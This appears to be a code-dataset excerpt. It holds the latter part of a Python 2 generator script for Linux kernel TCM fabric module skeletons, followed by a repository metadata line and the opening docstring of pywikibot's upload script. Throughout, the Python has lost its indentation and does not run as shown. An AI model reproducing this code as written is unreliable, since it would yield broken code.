buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
buf += " .sess_logged_in = " + fabric_mod_name + "_sess_logged_in,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_task_tag = " + fabric_mod_name + "_get_task_tag,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .get_fabric_sense_len = " + fabric_mod_name + "_get_fabric_sense_len,\n"
buf += " .set_fabric_sense_len = " + fabric_mod_name + "_set_fabric_sense_len,\n"
buf += " .is_state_remove = " + fabric_mod_name + "_is_state_remove,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += " .fabric_post_link = NULL,\n"
buf += " .fabric_pre_unlink = NULL,\n"
buf += " .fabric_make_np = NULL,\n"
buf += " .fabric_drop_np = NULL,\n"
buf += " .fabric_make_nodeacl = " + fabric_mod_name + "_make_nodeacl,\n"
buf += " .fabric_drop_nodeacl = " + fabric_mod_name + "_drop_nodeacl,\n"
buf += "};\n\n"
buf += "static int " + fabric_mod_name + "_register_configfs(void)\n"
buf += "{\n"
buf += " struct target_fabric_configfs *fabric;\n"
buf += " int ret;\n\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \" on \"UTS_RELEASE\"\\n\"," + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += " /*\n"
buf += " * Register the top level struct config_item_type with TCM core\n"
buf += " */\n"
buf += " fabric = target_fabric_configfs_init(THIS_MODULE, \"" + fabric_mod_name[4:] + "\");\n"
buf += " if (IS_ERR(fabric)) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_init() failed\\n\");\n"
buf += " return PTR_ERR(fabric);\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup fabric->tf_ops from our local " + fabric_mod_name + "_ops\n"
buf += " */\n"
buf += " fabric->tf_ops = " + fabric_mod_name + "_ops;\n"
buf += " /*\n"
buf += " * Setup default attribute lists for various fabric->tf_cit_tmpl\n"
buf += " */\n"
buf += " TF_CIT_TMPL(fabric)->tfc_wwn_cit.ct_attrs = " + fabric_mod_name + "_wwn_attrs;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_param_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_np_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_base_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_attrib_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_auth_cit.ct_attrs = NULL;\n"
buf += " TF_CIT_TMPL(fabric)->tfc_tpg_nacl_param_cit.ct_attrs = NULL;\n"
buf += " /*\n"
buf += " * Register the fabric for use within TCM\n"
buf += " */\n"
buf += " ret = target_fabric_configfs_register(fabric);\n"
buf += " if (ret < 0) {\n"
buf += " printk(KERN_ERR \"target_fabric_configfs_register() failed\"\n"
buf += " \" for " + fabric_mod_name.upper() + "\\n\");\n"
buf += " return ret;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Setup our local pointer to *fabric\n"
buf += " */\n"
buf += " " + fabric_mod_name + "_fabric_configfs = fabric;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Set fabric -> " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_deregister_configfs(void)\n"
buf += "{\n"
buf += " if (!" + fabric_mod_name + "_fabric_configfs)\n"
buf += " return;\n\n"
buf += " target_fabric_configfs_deregister(" + fabric_mod_name + "_fabric_configfs);\n"
buf += " " + fabric_mod_name + "_fabric_configfs = NULL;\n"
buf += " printk(KERN_INFO \"" + fabric_mod_name.upper() + "[0] - Cleared " + fabric_mod_name + "_fabric_configfs\\n\");\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " int ret;\n\n"
buf += " ret = " + fabric_mod_name + "_register_configfs();\n"
buf += " if (ret < 0)\n"
buf += " return ret;\n\n"
buf += " return 0;\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " " + fabric_mod_name + "_deregister_configfs();\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
continue
line = p.readline()
# Search for function pointer
if not re.search('\(\*', line):
continue
fabric_ops.append(line.rstrip())
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi.h>\n"
buf += "#include <scsi/scsi_host.h>\n"
buf += "#include <scsi/scsi_device.h>\n"
buf += "#include <scsi/scsi_cmnd.h>\n"
buf += "#include <scsi/libfc.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_configfs.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
total_fabric_ops = len(fabric_ops)
i = 0
while i < total_fabric_ops:
fo = fabric_ops[i]
i += 1
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name[4:] + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_fabric_proto_ident', fo):
buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " u8 proto_id;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return proto_id;\n"
buf += "}\n\n"
bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('get_default_depth', fo):
buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
if re.search('get_pr_transport_id\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code,\n"
buf += " unsigned char *buf)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!nacl) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
|
wikimedia/pywikibot-core
|
refs/heads/master
|
scripts/upload.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script to upload images to wikipedia.
The following parameters are supported:
-keep Keep the filename as is
-filename: Target filename without the namespace prefix
-prefix: Add specified prefix to every filename.
-noverify Do not ask for verification of the upload description if one
is given
-abortonwarn: Abort upload on the specified warning type. If no warning type
is specified, aborts on any warning.
-ignorewarn: Ignores specified upload warnings. If no warning type is
specified, ignores all warnings. Use with caution
-chunked: Upload the file in chunks (more overhead, but restartable). If
no value is specified the chunk size is 1 MiB. The value must
be a number which can be preceded by a suffix. The units are:
No suffix: Bytes
'k': Kilobytes (1000 B)
'M': Megabytes (1000000 B)
'Ki': Kibibytes (1024 B)
'Mi': Mebibytes (1024x1024 B)
The suffixes are case insensitive.
-always Don't ask the user anything. This will imply -keep and
-noverify and require that either -abortonwarn or -ignorewarn
is defined for all. It will also require a valid file name and
description. It'll only overwrite files if -ignorewarn includes
the 'exists' warning.
-recursive When the filename is a directory it also uploads the files from
the subdirectories.
-summary: Pick a custom edit summary for the bot.
-descfile: Specify a filename where the description is stored
